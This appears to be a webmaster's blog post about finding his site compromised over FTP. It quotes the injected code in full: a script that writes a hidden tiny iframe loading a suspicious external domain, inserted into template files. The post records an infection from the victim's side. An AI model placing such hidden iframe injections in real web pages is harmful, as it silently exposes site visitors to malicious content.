Malware

Viruses on the site. How was FTP hacked?

On July 2, I unexpectedly received the following letter from Yandex in my mail:

Some of the pages on your website may pose a threat to your visitor's computer security. The number of potentially harmful pages is 1.

Registered on webmaster.yandex.com, launched a second check. The next day it wrote that everything was fine, but I still decided to compare all the site files with last year's copy. It turned out that 12 files differ.
In the temlates folder, two files had the date 06/29/12. In the header.tpl file, instead of the line

<body style="background: url(<?=PATH_WEB?>img/main_bg.gif) repeat-y center #244e9f;">

this mess came up:

<body style="background: url(<?=PATH_WEB?><!--c3284d--> type="text/javascript">
document.write('<iframe src="httр://yоgоtraff.cu.cc/in.cgi?11" name="Google " scrolling="auto" frameborder="no" align="center" height="2" width="2"></iframe>');
</script><!--/c3284d-->

img/main_bg.gif) repeat-y center #244e9f;">

The same was in the galleryEdit.tpl file and ten more files in the script\jscalendar folder.
If you search on Google, this yogotraff can be found in the code of many Russian sites: www.google.ru/search?ie=UTF-8&hl=ru&q=yogotraff.
Obviously, this is some kind of malicious stuff. Of course, I recovered the files, changed the passwords and wrote a request to the hosting provider, asking how the infection happened. Got a response and logs. At this time, someone from the American address 208.77.96.72 climbed into two of my ftp (and the second is inside the first) and replaced a bunch of files there. As it turned out, my other sites also suffered. The provider offered to scan my computer for viruses. Checked. DrWeb and Kaspersky from boot disks to clear my conscience. There are no viruses. Just little things in FireFox's cache. And how then was my ftp password stolen? It's complicated, you can't pick it up.
What a terrible life.